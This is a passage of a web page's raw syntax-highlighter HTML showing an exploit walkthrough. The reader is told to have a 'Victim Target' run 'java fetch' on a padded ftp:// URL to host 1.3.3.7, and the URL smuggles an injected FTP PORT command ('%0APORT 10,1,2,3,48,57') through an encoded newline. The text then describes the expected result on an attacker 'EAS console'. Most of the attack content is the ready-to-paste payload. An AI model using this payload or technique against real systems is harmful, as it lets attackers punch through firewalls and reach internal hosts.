crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-29\">29<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-2\"><span class=\"crayon-e\">First <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">give <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">vulnerable <\/span><span class=\"crayon-e\">host <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-3\"><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-4\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-5\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-6\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-7\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-8\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-9\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-10\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-11\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-12\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-13\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-14\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-15\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-16\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-17\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-18\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-19\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-20\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-21\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-22\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-23\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-24\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-25\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-26\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-27\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485fe156468683-28\"><span class=\"crayon-v\">XXX<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">0APORT<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2010<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">57<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">txt<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485fe156468683-29\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>Copy and paste this URL into a command on the Victim Target (VT):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448601357576808\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> java fetch ftp:\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXX%0APORT%2010,1,2,3,48,57\/z.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448601357576808-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448601357576808-26\">26<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-1\"><span class=\"crayon-e\">java <\/span><span class=\"crayon-e\">fetch <\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-2\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-3\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-4\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-5\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-6\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-7\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-8\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-9\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-10\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-11\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-12\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-13\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-14\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-15\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-16\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-17\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-18\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-19\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-20\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-21\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-22\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-23\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-24\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448601357576808-25\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448601357576808-26\"><span class=\"crayon-v\">XXX<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">0APORT<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2010<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">57<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>The directory with all of the padding (X&#8217;s) is too long for one packet, but upon fetching this, the FTP server will calculate the correct URL to use for success.<\/p>\n<p>You should now see something like this on the EAS console:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448605222122713\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div 